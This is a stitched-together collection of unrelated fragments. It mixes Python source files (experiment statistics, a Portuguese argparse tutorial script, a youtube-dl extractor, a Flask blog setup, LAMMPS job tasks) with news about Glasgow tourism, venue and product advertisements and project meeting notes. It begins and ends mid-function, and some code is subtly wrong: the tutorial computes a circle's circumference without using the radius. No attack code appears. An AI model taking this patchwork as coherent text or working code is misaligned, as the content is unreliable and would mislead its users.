conf = grouped.apply(confidence_interval).rename(columns=map_column_names("Confidence interval"))
return pandas.concat([means, std, conf], axis=1)
@staticmethod
def calculate_runtime_stats(cls_name, collected_measurements):
#make a big matrix of all collected measurements over all replications, no need to group anything here
m = pandas.DataFrame(collected_measurements, columns=runtime_metrics)
#calculate statistics, rename columns to include name of statistic, e.g. Training time -> (Training time, Mean)
means = pandas.DataFrame(m.mean()).transpose()
means.columns = [(metric, "Mean") for metric in runtime_metrics]
std = pandas.DataFrame(m.std()).transpose()
std.columns = [(metric, "Standard deviation") for metric in runtime_metrics]
conf = pandas.DataFrame(confidence_interval(m)).transpose()
conf.columns = [(metric, "Confidence interval") for metric in runtime_metrics]
#put all individual statistics together and set name of classifier as index
combined = pandas.concat([means, std, conf], axis=1)
combined.index = [cls_name]
return combined
class Results():
"""
Class that contains the results of a cross-validation experiment. Allows to print and to plot results.
"""
def __init__(self, classifiers, quality_stats, runtime_stats):
"""
@param classifiers: The classifiers that were used in the experiment.
@param quality_stats: A pandas dataframe with 12 columns for each classifier (one column for each possible
combination of collected quality metrics and calculated statistics). The index of the dataframe is the cutoff,
i.e. how many recommendations where shown to the user.
@param runtime_stats: A pandas dataframe with 9 columns for each classifier (one column for each possible
combination of collected runtime metrics and calculated statistics). The index of the dataframe are the names of
the tested classifiers.
@return:
"""
self.classifiers = classifiers
self.quality_stats = quality_stats
self.runtime_stats = runtime_stats
def compare_quality(self, metric, statistic, cutoff_results_at=None):
"""
Grab results for given metric and statistic for all tested classifiers.
@param metric: Name of one of the quality metrics.
@param statistic: Which statistic to compare (Mean, Standard deviation, Confidence interval)
@param cutoff_results_at: At any given time only a limited number of services can be available
and can be recommended, e.g. for 10 binary sensors, 10 services are typically available. The only anomaly is
right at the beginning of the dataset, where the current status of a sensor is not known, in this case more than
10 services can be recommended. However, there will be very few instances where this is the case and
recommendation results will therefore be statistically insignificant. If this parameter is set to any other
value than None, the output will be restricted to show only results where the cutoff for the number of
recommendations to be shown lies between 1 and this parameter.
@return: A pandas dataframe with one column for every classifier, listing the calculated statistics for the
given metric and all cutoffs.
"""
assert(statistic in calculated_stats)
assert(metric in quality_metrics)
relevant_columns = [(cls.name, metric, statistic) for cls in self.classifiers]
new_column_names = [cls.name for cls in self.classifiers]
comparison = self.quality_stats[relevant_columns]
comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
if not cutoff_results_at is None:
comparison = comparison.loc[1: cutoff_results_at]
return comparison
def print_quality_comparison(self, metrics=quality_metrics, cutoff_results_at=None):
"""
For each of the quality metrics, print a table of confidence intervals. One column for each tested classifier
and one row for each tested recommendation cutoff.
@param cutoff_results_at: see `self.compare_quality`
@param metrics: print comparison only for these metrics
@return:
"""
for metric in metrics:
print "Results for %s" % metric
print self.compare_quality(metric, "Confidence interval", cutoff_results_at)
def print_quality_comparison_at_cutoff(self, cutoff, metrics=quality_metrics):
"""
Print one shared table of confidence intervals for all of the quality metrics. One row for each tested classifier,
one column for each calculated quality metric. Cutoff the recommendation results at `cutoff`, i.e. the user is
at most shown `cutoff` recommendations.
@param cutoff: The cutoff for which to print the results.
@param metrics: print comparison only for these metrics
@return:
"""
comparison = {metric: self.compare_quality(metric, "Confidence interval").loc[cutoff]
for metric in metrics}
comparison = pandas.DataFrame(comparison)[metrics]
print comparison
def print_runtime_comparison(self, metrics=runtime_metrics):
"""
Print one shared table of confidence intervals for all runtime metrics. One row for each tested classifier,
one column for each calculated runtime metric.
@param metrics: print comparison only for these metrics
@return:
"""
relevant_columns = [(metric, "Confidence interval") for metric in metrics]
new_column_names = [metric for metric in metrics]
comparison = self.runtime_stats[relevant_columns]
comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
print comparison
def plot_quality_comparison(self, plot_config, cutoff_results_at=None, metrics=quality_metrics):
"""
For each of the quality metrics, generate an XY-line-plot with one line for each classifier. The X-axis is the
number of recommendations that are shown to the user, the Y-axis is the metric of interest. Uses the means of
the measurements.
@param plot_config: A function that can be called to get the full path for a plot file.
@param cutoff_results_at: see `self.compare_quality`
@param metrics: plot comparison only for these metrics
@return:
"""
for metric in metrics:
results = self.compare_quality(metric, "Mean", cutoff_results_at)
plot.plot_quality_comparison(results, metric, plot_config)
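# Minimal usage sketch (added example; the dataset and classifier are
# placeholders, not part of the original module):
#   experiment = Experiment(my_dataset)  # any dataset exposing .data and .target
#   experiment.add_classifier(my_classifier, name="Naive Bayes")
#   results = experiment.run(folds=10)
#   results.print_runtime_comparison()
#   results.print_quality_comparison_at_cutoff(cutoff=5)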
|
EVENTS such as the Commonwealth Games, Radio 1's Big Weekend and the MTV EMAs saw the number of international and domestic tourists rise by 37 per cent.
THE number of tourists visiting Glasgow increased by 37 per cent last year, new figures have revealed.
High-profile events, including the Commonwealth Games, Radio 1's Big Weekend and the MTV EMAs helped attract 2.7 million international and domestic tourists to the city.
There was also a significant rise in visitor spending over the "incredible" 12 months for the city.
The figures, released by the Office for National Statistics (ONS), showed visitors spent £687 million - up 39 per cent from £495 million the previous year.
The majority of international tourists to Glasgow last year travelled from Europe and North America, while visitors from further afield, including China, India and Australia, totalled 19 per cent.
Most international tourists said they were in the city on holiday, whilst almost a quarter visited friends and relatives and 18 per cent were business travellers.
It sees Glasgow overtake Liverpool as the fifth most visited UK city by international tourists.
Scotland's largest city also ranks ahead of Oxford, Bristol, Cambridge, Leeds, York, Cardiff and Newcastle.
New data from the Great Britain Tourism Survey also showed that domestic visitors made more than 2.1 million trips to Glasgow last year - a 56 per cent increase on the previous 12 months.
Councillor Gordon Matheson, leader of Glasgow City Council, said: "Tourism is a crucial pillar of Glasgow's economic strategy and these figures strongly reinforce our commitment to delivering a world-class visitor experience.
"2014 was an incredible year for Glasgow; it was the most exciting and high-profile period in our history.
"A key legacy of 2014 is that our global profile has never been greater. We're now firmly recognised as one of the world's must-visit destinations while the overwhelming success of the Commonwealth Games has ensured that we've become a first-choice host for major international events and conferences, with confirmed business on our books until 2022."
Last week, we told you that the Glasgow 2014 Commonwealth Games contributed more than £740 million to Scotland's economy.
The Post-Games report found that, over the eight years from winning the bid to hosting the event, the Games contributed more than £740 million gross to the country's economy, including £390 million for Glasgow 's economy.
It also supported on average 2,100 jobs each year from 2007 and 2014, including 1,200 on average in Glasgow.
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
#
# Description: Hello World!
# - vs 3 - Making the code easier to run by passing parameters at
# execution time
#
# Author: @Palin
#
# Last Update: 10/2016
# Created: 10/2016
# Copyright: (c) Ampere Desenvolvimento 2016
#-------------------------------------------------------------------------------
# Always import these packages
import sys
import os
import math
# Trying to import a package that MAY not be installed!
# A recipe worth memorizing: always use Try/Except
# It saves the programmer's life!
try:
# ONLY CHANGE HERE! - Add as many packages as you want to import
import argparse
import matplotlib
except ImportError as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback_details = {
'filename': exc_traceback.tb_frame.f_code.co_filename,
'lineno': exc_traceback.tb_lineno,
'name': exc_traceback.tb_frame.f_code.co_name,
'type': exc_type.__name__
}
print("#" * 80)
print("# Descrição do Erro: " + str(e))
print(traceback_details)
print("#" * 80)
sys.exit()
# ----------------------
# Always document the code
# The comments are later used to generate HTML documentation.
# In general, code documentation is generated with the Sphinx package
#
# Goal: get the name passed on the command prompt
#
# ----------------------
def main():
# receiving the parameters
# If nothing was changed, the default parameters were used!
lstArgs = parametros_prompt()
str_nome = lstArgs.str_recebe_nome
print_debug = lstArgs.flag_imprimir
dbl_raio = lstArgs.dbl_raio
print("Olá " + str_nome + ", seja bem-vindo!")
print("Dado o raio " + str(dbl_raio) + " o comprimento da circunferência = " + str(2*math.pi))
print("Dado o raio " + str(dbl_raio) + " a área da circunferência = " + str(math.pi * dbl_raio**2 ))
if print_debug:
print("Foi definido que era para imprimir o Debug!")
##------------------------------------------------------------------------------
## @@ Inicializa o Escritor de Log
##------------------------------------------------------------------------------
def parametros_prompt():
# --------------------------------------------------------------------------
# Utiliza o pacote argparse
# Recebe os PARAMETROS DE ENTRADA passados pelo usuario na EXECUCAO do
# --------------------------------------------------------------------------
""" Objetivo:
- Capturar os parametros do prompt e retorna-los em uma lista.
:Date: 10/2016
:Version: 1.0
:Authors: @Palin
:copyright: @Marcelo Palin
"""
## parser = argparse.ArgumentParser(
## prog = 'hello_03.py',
## description = "Minicurso Aprendendo Python - XXVIII SEMAT - Versao 1.0"
## + " Este programa recebe 2 parametros de entrada no momento da execucao."
## + " S",
## epilog = 'Para consultar o Help digite: python hello_03.py -h '
## )
# String em várias linhas utilize ''' ''' para envolver.
parser = argparse.ArgumentParser(
prog = 'hello_03.py',
description = '''Minicurso Aprendendo Python - XXVIII SEMAT - Versao 1.0
Este programa recebe 3 parametros de entrada no momento da execucao.
Sao eles: O Nome da pessoa, o raio de uma circunferencia e a flag
mostrar detalhes (debug).
\n exemplo de execução:
$ python hello_03.py -debug 1 -raio 2 -nome "Marcelo Palin"
''',
epilog = 'Para consultar o Help digite: python hello_03.py -h '
)
parser.add_argument('-v', '--version', action='version', version='%(prog)s vs. 1.0')
parser.add_argument('-raio', action='store', dest='dbl_raio', type=float, default=1.0)
parser.add_argument('-debug', action='store', dest='flag_imprimir', type=int, default=0) #0 = false, 1 = true
parser.add_argument('-nome', action='store', dest='str_recebe_nome', default="Palin" )
# Pega a lista de parametros passada no prompt de comando e armazena em uma lista
# Ex de execucao: python hello_03 -debug 0 -nome "Marcelo Palin"
lstArgs = parser.parse_args()
return lstArgs
##@fim do metodo
##----------------------------------------------------------------------------
# Quando executo o codigo, qual funcao devo chamar primeiro?
if __name__ == '__main__':
main()
|
Choosing the ideal venue for a corporate event is never easy. Even if you narrow things down to the most popular banquet halls in ECR, you’ll still find yourself with plenty of options to choose from.
The question being – which is the ideal banquet hall for your corporate event?
As every corporate event is unique, so too are the requirements of the respective business. Rather than following the pack, therefore, it’s important to consider what’s required and what’s preferable for your event specifically. The good news is that the more precise you are with the details, the easier it becomes to select and secure the ideal banquet hall.
First up, research suggests that the most common excuse among attendees for failing to attend corporate functions is poor accessibility. Unless guests can access your chosen banquet hall with ease, there’s a strong chance they simply won’t turn up. If possible, ensure you select a central location with the strongest possible public transport links. In addition, consider the special requirements of any attendees who may have mobility issues. If you have even the slightest concern regarding accessibility, you may want to look elsewhere.
If some or all of your delegates will require overnight accommodation, you'll need to ensure it is provided and is conveniently accessible. Not a problem if you book your corporate event at the Hotel Mamallaa Heritage, but more of a challenge if you select a basic meeting room in the middle of nowhere. It's unfair to expect your guests to make long and complicated journeys back to their lodgings at the end of the function. If nothing else, ensure that taxis or a free shuttle service are made available for the convenience of your guests.
Booking as far in advance as possible should be considered mandatory, in order to avoid issues with availability. It's worth remembering that prime banquet halls in desirable locations may be reserved more than one year ahead of time. That's not to say that last-minute bookings are impossible, but quality slots are more difficult to come by as the date draws nearer. Ensure you book as far in advance as realistically possible, though be sure to ask about the provider's policy regarding cancellations or modifications at a later date.
Not every facility is ideally suited to every type of event. It’s therefore up to you to ensure that the image and general suitability of the venue you choose are a good match for your business. Venues vary from the most formal and sophisticated banquet halls to the most relaxing and enjoyable social spaces imaginable. You may also have the option of organizing an indoor or outdoor event, in accordance with your requirements and the time of year.
All cost considerations should center on value for money, as opposed to the lowest possible prices. It’s one thing to book a banquet hall for next to nothing, but not at the expense of an effective event that meets its objectives. Always consider what you’re actually getting for your money, but don’t be afraid to negotiate. Particularly if looking to arrange regular meetings at the same venue, it’s only fair that the provider offers some kind of special deal or discount.
The extent to which your delegates will be provided with a wall-to-wall service is entirely up to you. Set out a buffet, organize a formal dinner or whatever suits the event. In all instances, you'll need to think carefully about the staff and support required to ensure the event goes off without a hitch. Some venues provide all the staff you'll need, while others invite clients to bring their own third-party staff and catering teams along for the ride.
Speaking of which, if you do decide to go with the venue's in-house catering offer, you need to ensure that it is of a sufficient quality standard, and that it caters to delegates who may have allergies, intolerances or specific dietary preferences of any kind. Once again, it's important to address such issues as early as possible, submitting requests and asking questions long in advance of the event.
Take nothing for granted when it comes to equipment; instead, ask as many questions as necessary. Just because the venue has a stock of audio-visual equipment doesn't mean it will be up to the standard you require. Request specific assurances regarding the quality and capabilities of the equipment available. In addition, consider the wider facilities at the venue you're considering, which incorporate everything from cloakrooms to bathrooms to parking and so on.
If the facility is accessible for you personally, it's in your best interests to check it out in person before finalizing your booking. The reason being that what appears to be a polished and professional corporate venue on paper may not live up to expectations in the flesh. Take the time to organize a tour of the facility, during which you should have the opportunity to ask as many questions as necessary.
Last but not least, spend at least a little time online searching for reviews and recommendations from past customers. You could also ask the venue to provide its own references, or case studies detailing similar events organized before. Establish what kind of feedback the venue has accrued over the years and consider the consensus. If customer reviews paint a positive picture of the venue, you’re probably in safe hands. |
"""Comment sheet."""
from colander import deferred
from substanced.util import find_service
from adhocracy_core.interfaces import ISheet
from adhocracy_core.interfaces import ISheetReferenceAutoUpdateMarker
from adhocracy_core.interfaces import SheetToSheet
from adhocracy_core.sheets import add_sheet_to_registry
from adhocracy_core.schema import MappingSchema
from adhocracy_core.schema import Integer
from adhocracy_core.schema import PostPool
from adhocracy_core.schema import Reference
from adhocracy_core.schema import Text
from adhocracy_core.sheets import sheet_meta
class IComment(ISheet, ISheetReferenceAutoUpdateMarker):
"""Marker interface for the comment sheet."""
class ICommentable(ISheet, ISheetReferenceAutoUpdateMarker):
"""Marker interface for resources that can be commented upon."""
class CommentRefersToReference(SheetToSheet):
"""Reference from comment version to the commented-on item version."""
source_isheet = IComment
source_isheet_field = 'refers_to'
target_isheet = ICommentable
class CommentSchema(MappingSchema):
"""Comment sheet data structure.
`content`: Text
"""
refers_to = Reference(reftype=CommentRefersToReference)
content = Text()
# TODO add post_pool validator
comment_meta = sheet_meta._replace(isheet=IComment,
schema_class=CommentSchema)
@deferred
def deferred_default_comment_count(node: MappingSchema, kw: dict) -> str:
"""Return comment_count of the current `context` resource."""
context = kw['context']
catalogs = find_service(context, 'catalogs')
return catalogs.get_index_value(context, 'comments')
class CommentableSchema(MappingSchema):
"""Commentable sheet data structure.
`post_pool`: Pool to post new :class:`adhocracy_sample.resource.IComment`.
"""
comments_count = Integer(readonly=True,
default=deferred_default_comment_count)
post_pool = PostPool(iresource_or_service_name='comments')
commentable_meta = sheet_meta._replace(
isheet=ICommentable,
schema_class=CommentableSchema,
editable=False,
creatable=False,
)
def includeme(config):
"""Register sheets."""
add_sheet_to_registry(comment_meta, config.registry)
add_sheet_to_registry(commentable_meta, config.registry)
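

# Usage sketch (assumption): in a Pyramid application a module like this is
# typically wired up from the configurator, e.g.:
#
#     config.include('adhocracy_core.sheets.comment')
#
# which calls includeme(config) above. The dotted module path is a guess
# based on the package imports in this file, not taken from the original.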
|
These corbels are made with Hydrostone, a rugged material made of gypsum and silica sand. They can be finished to re-create the look of old stone (as shown in photo) or with a faux marble finish.
The manufacturer promises that they're sturdy enough for use with bookshelves or mantels.
Big Antique Corbels measure 12" x 9" x 5".
Price is $145 for one or $235 for two (November 2006).
Get Design Daveluy contact information, plus see product reviews we've published about the company.
#!/usr/bin/env python

import os
import unittest

from mi.logging import log
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_telemetered_driver import parse as parse_telemetered
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_recovered_driver import parse as parse_recovered
from mi.dataset.driver.ctdav_n.auv.resource import RESOURCE_PATH
from mi.dataset.dataset_driver import ParticleDataHandler

__author__ = 'Rene Gelinas'


class DriverTest(unittest.TestCase):

    source_file_path = os.path.join(RESOURCE_PATH, 'subset_reduced.csv')

    def test_telemetered_deprecation(self):
        particle_data_handler = parse_telemetered(None, self.source_file_path, ParticleDataHandler())
        log.info("SAMPLES: %s", particle_data_handler._samples)
        log.info("FAILURE: %s", particle_data_handler._failure)
        self.assertEqual(particle_data_handler._failure, False)

    def test_recovered_deprecation(self):
        particle_data_handler = parse_recovered(None, self.source_file_path, ParticleDataHandler())
        log.info("SAMPLES: %s", particle_data_handler._samples)
        log.info("FAILURE: %s", particle_data_handler._failure)
        self.assertEqual(particle_data_handler._failure, False)


if __name__ == '__main__':
    # unittest.TestCase must be constructed with the name of an existing test
    # method; the original 'deprecation_tests' would raise ValueError.
    test = DriverTest('test_telemetered_deprecation')
    test.test_telemetered_deprecation()
    test.test_recovered_deprecation()
|
Melody Park is a six-acre venue found in Hagerstown, Maryland. It features a 4,000 square foot pavilion with an 800 square foot concession area. The park is located in a secluded setting off of Greencastle Pike. Running through the park, you will find the serene Traupe Run stream that passes under two walking bridges. Our site can accommodate hundreds for picnics, concerts, car shows, or just about any special event!
Please browse our website to see the different features of Melody Park! Check out our Facebook page as well by clicking on the Facebook icon in the upper right corner!
Click below to rent Melody Park! |
# coding: utf-8
from __future__ import unicode_literals

import re

from .common import InfoExtractor
from ..utils import (
    determine_ext,
    unescapeHTML,
)


class CJSWIE(InfoExtractor):
    _VALID_URL = r'https?://(?:www\.)?cjsw\.com/program/(?P<program>[^/]+)/episode/(?P<id>\d+)'
    _TESTS = [{
        'url': 'http://cjsw.com/program/freshly-squeezed/episode/20170620',
        'md5': 'cee14d40f1e9433632c56e3d14977120',
        'info_dict': {
            'id': '91d9f016-a2e7-46c5-8dcb-7cbcd7437c41',
            'ext': 'mp3',
            'title': 'Freshly Squeezed – Episode June 20, 2017',
            'description': 'md5:c967d63366c3898a80d0c7b0ff337202',
            'series': 'Freshly Squeezed',
            'episode_id': '20170620',
        },
    }, {
        # no description
        'url': 'http://cjsw.com/program/road-pops/episode/20170707/',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        program, episode_id = mobj.group('program', 'id')
        audio_id = '%s/%s' % (program, episode_id)

        webpage = self._download_webpage(url, episode_id)

        title = unescapeHTML(self._search_regex(
            (r'<h1[^>]+class=["\']episode-header__title["\'][^>]*>(?P<title>[^<]+)',
             r'data-audio-title=(["\'])(?P<title>(?:(?!\1).)+)\1'),
            webpage, 'title', group='title'))

        audio_url = self._search_regex(
            r'<button[^>]+data-audio-src=(["\'])(?P<url>(?:(?!\1).)+)\1',
            webpage, 'audio url', group='url')

        audio_id = self._search_regex(
            r'/([\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})\.mp3',
            audio_url, 'audio id', default=audio_id)

        formats = [{
            'url': audio_url,
            'ext': determine_ext(audio_url, 'mp3'),
            'vcodec': 'none',
        }]

        description = self._html_search_regex(
            r'<p>(?P<description>.+?)</p>', webpage, 'description',
            default=None)
        series = self._search_regex(
            r'data-showname=(["\'])(?P<name>(?:(?!\1).)+)\1', webpage,
            'series', default=program, group='name')

        return {
            'id': audio_id,
            'title': title,
            'description': description,
            'formats': formats,
            'series': series,
            'episode_id': episode_id,
        }
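

# Usage sketch (assumption): extractors like CJSWIE are normally driven
# through the YoutubeDL front end rather than instantiated directly, e.g.:
#
#     import youtube_dl
#     with youtube_dl.YoutubeDL({'skip_download': True}) as ydl:
#         info = ydl.extract_info('http://cjsw.com/program/freshly-squeezed/episode/20170620')
#         print(info['title'])
#
# The options shown are illustrative only.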
|
import os
import logging
from logging import Formatter
from logging.handlers import RotatingFileHandler
from flask import Flask
# The flask.ext.* namespace has been removed; import the extensions directly.
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
app = Flask(__name__)
app.config.from_object('bloks.config')
# Check for various necessary configuration keys
assert 'BLOG_TITLE' in app.config, 'No BLOG_TITLE config value found'
assert 'BLOG_DESCRIPTION' in app.config, 'No BLOG_DESCRIPTION config value found'
assert 'SECRET_KEY' in app.config, 'No SECRET_KEY config value found'
assert 'LOG_PATH' in app.config, 'No LOG_PATH config value found'
# Initialize logging handler
handler = RotatingFileHandler(app.config['LOG_PATH'], maxBytes=1000, backupCount=1)
handler.setFormatter(Formatter('%(asctime)s %(levelname)s: %(message)s'))
handler.setLevel(logging.INFO)
app.logger.addHandler(handler)
# Initialize PageDown
pagedown = PageDown(app)
# Initialize SQLAlchemy database
db = SQLAlchemy(app)
# Initialize LoginManager
lm = LoginManager()
lm.init_app(app)
from . import utils
from .models import Link
app.jinja_env.globals.update(render_markdown=utils.render_markdown)
app.jinja_env.globals.update(join=os.path.join)
app.jinja_env.globals.update(link_query=Link.query.all)
from . import views, admin_views, errors, models
__all__ = ['views', 'admin_views', 'errors', 'models', ]
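
# Configuration sketch (assumption): bloks/config.py is not shown here, but
# the asserts above imply it must define at least the following keys. Values
# are placeholders; SQLALCHEMY_DATABASE_URI is inferred from the
# SQLAlchemy(app) initialization, not taken from the original source.
#
#     BLOG_TITLE = 'My Blog'
#     BLOG_DESCRIPTION = 'A short description of the blog'
#     SECRET_KEY = 'change-me'
#     LOG_PATH = '/var/log/bloks.log'
#     SQLALCHEMY_DATABASE_URI = 'sqlite:///bloks.db'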
|
A spa in your own home. Royal Care series luxurious shower and steam systems are equipped with everything you need for total and complete relaxation. The multi-jet shower enclosure comes with an ultra-quick-heating 3KW steam generator, multiple body massage jets, a drenching 8 in. wide rainfall shower head, and a hand-held shower head with adjustable settings for many different water spray patterns. It also comes with a wireless media center that allows you to play your favorite music, talk shows, sporting events, etc. from the radio, MP3, CD, iPods and even your cell phone. Additionally, the multi-colored LED lights illuminate the aromatherapy-filled steam to create the ultimate relaxation experience.
The Homeward Bath video introduces luxurious shower and steam systems that offer unmatched quality and workmanship, and gives ideas about design, installation and finishing touches.
#!/usr/bin/env python
#
# @file CMakeFiles.py
# @brief class for generating the cmake files
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables
from . import DowncastExtensionFile
from . import DowncastNamespaceFile
from . import DowncastPackagesFile
from . import DowncastPluginsFile
from . import NativeSwigFile
from . import BaseBindingsFiles


class BindingFiles():
    """Class for all Bindings files"""

    def __init__(self, pkg_object, binding, verbose=False):
        # members from object
        self.package = pkg_object['name']
        self.verbose = verbose
        self.binding = binding
        self.language = global_variables.language

        self.elements = pkg_object['baseElements']
        self.plugins = pkg_object['plugins']

    #########################################################################
    # package files

    def write_downcast_extension(self):
        if not global_variables.is_package:
            return
        name = 'local-downcast-extension-{0}'.format(self.package)
        ext = DowncastExtensionFile.DowncastExtensionFile(name,
                                                          self.package,
                                                          self.binding)
        if self.verbose:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_downcast_namespace(self):
        if not global_variables.is_package:
            return
        name = 'local-downcast-namespaces-{0}'.format(self.package)
        ext = DowncastNamespaceFile.DowncastNamespaceFile(name,
                                                          self.package,
                                                          self.binding)
        if self.verbose:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_downcast_packages(self):
        if not global_variables.is_package:
            return
        if self.binding == 'csharp' or self.binding == 'java':
            name = 'local-packages-{0}'.format(self.package)
        else:
            name = 'local-downcast-packages-{0}'.format(self.package)
        ext = DowncastPackagesFile.DowncastPackagesFile(name,
                                                        self.package,
                                                        self.binding,
                                                        self.elements,
                                                        self.plugins)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_downcast_plugins(self):
        if not global_variables.is_package:
            return
        name = 'local-downcast-plugins-{0}'.format(self.package)
        ext = DowncastPluginsFile.DowncastPluginsFile(name,
                                                      self.package,
                                                      self.binding,
                                                      self.plugins)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    #########################################################################
    # local files

    def write_local(self):
        if global_variables.is_package:
            self.write_local_package_files()
        else:
            self.write_local_library_files()

    def write_local_package_files(self):
        if self.binding == 'csharp' or self.binding == 'java':
            return
        else:
            name = 'local-{0}'.format(self.package)
            ext = DowncastPackagesFile.DowncastPackagesFile(name,
                                                            self.package,
                                                            self.binding,
                                                            self.elements,
                                                            self.plugins,
                                                            True)
            if self.verbose and ext.fileout:
                print('Writing file {0}'.format(ext.fileout.filename))
            ext.write_file()
            ext.close_file()

    def write_local_library_files(self):
        base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
                                                         self.binding, True)
        base_files.write_files()

    ########################################################################
    # write files in the swig directory

    def write_swig_files(self):
        if global_variables.is_package:
            self.write_swig_package_files()
        else:
            self.write_swig_library_files()

    def write_swig_package_files(self):
        name = '{0}-package'.format(self.package)
        ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
                                            self.plugins, is_header=True)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

        name = '{0}-package'.format(self.package)
        ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
                                            self.plugins, is_header=False)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_swig_library_files(self):
        base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
                                                         'swig', True)
        base_files.write_files()

    ########################################################################
    # other library files

    def write_cmake_file(self):
        if global_variables.is_package:
            return
        base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
                                                         self.binding, True)
        base_files.write_files()

    ########################################################################

    def write_files(self):
        if self.binding != 'swig':
            self.write_downcast_extension()
            self.write_downcast_namespace()
            self.write_downcast_packages()
            self.write_downcast_plugins()
            self.write_local()
        else:
            self.write_swig_files()
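

# Usage sketch (assumption): based on __init__ above, pkg_object needs at
# least 'name', 'baseElements' and 'plugins'; the binding names come from the
# checks in the methods ('csharp', 'java', 'swig', ...).
#
#     pkg_object = {'name': 'qual', 'baseElements': [], 'plugins': []}
#     for binding in ('csharp', 'java', 'swig'):
#         BindingFiles(pkg_object, binding, verbose=True).write_files()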
|
Catania (Sicily) is the location chosen for the next Working Group Meetings. The four groups will meet at the Principe Hotel and Monastero Benedettini from the 19th to the 20th of October 2015.
The individual WG meetings will take place on the first day at the Principe Hotel; the steering board meeting will follow in the afternoon.
The Annual Management Committee Meeting and Working group Meetings were held in Le Pecq, Paris, from 14th to 16th of April 2015. Samuel Martin, MC member from Suez Environment, led the local organisation.
Over 70 participants met in Verona (Italy) to hold the annual Management Committee Meeting and Working Group Meetings.
Both meetings were located in the Polo Didattico “Giorgio Zanotto” at the University of Verona.
The 4 working groups first met separately; after a short coffee break, all WGs got together for conclusions. The Management Committee meeting started on the 23rd, after lunch.
The first workshop of WP3 “Environmental and Economic Impact” took place in Garmisch-Partenkirchen (Germany). The aims of the workshop were to consolidate the task forces defined during the Thraki Palace conference in order to tackle the biggest problems concerning ecological and economic impact of future wastewater treatment plants, to review the state of the art and to shape our ideas on micropollutants, greenhouse gases and odors, and concepts for recycled water reuse.
In total, 21 participants from 11 countries attended the workshop (details in the attendance list).
# -*- coding: utf-8 -*-
#
# Copyright (C) University College London, 2013, all rights reserved.
#
# This file is part of FabMD and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#
from fab import *

# Imports needed by the tasks below (os for path handling, numpy for the
# pressure statistics in lammps_get_pressure); the original snippet omitted them.
import os
import numpy as np


@task
def lammps(config, **args):
    """Submit a LAMMPS job to the remote queue.

    The job results will be stored with a name pattern as defined in the environment,
    e.g. cylinder-abcd1234-legion-256

    config : config directory to use to define geometry, e.g. config=cylinder

    Keyword arguments:
    cores : number of compute cores to request
    images : number of images to take
    steering : steering session i.d.
    wall_time : wall-time job limit
    memory : memory per node
    """
    with_config(config)
    execute(put_configs, config)
    job(dict(script='lammps',
             cores=4, wall_time='0:15:0', memory='2G'), args)


#@task
#def lammps_swelling_test(config, **args):
#    """Submits a set of LAMMPS jobs to the remote queue, as part of a clay swelling test."""
#    # let's first try to run the exfoliated one.
#    # lammps_in_file =
#    # with_config(config)
#    # execute(put_configs,config)
#    # loop over swelling values
#    # update_environment(dict(job_results, job_config_path))
#    # job(dict(script='lammps',
#    #          cores=4, wall_time='0:15:0',memory='2G'),args)


### IBI ###

@task
def do_ibi(number, outdir, pressure=1, config_name="peg", copy="yes", ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot, 'python')):
    """ Copy the obtained output to a work directory, do an IBI iteration and make a new config file from the resulting data. """
    ibi_in_dir = os.path.join(env.localroot, 'results', outdir)
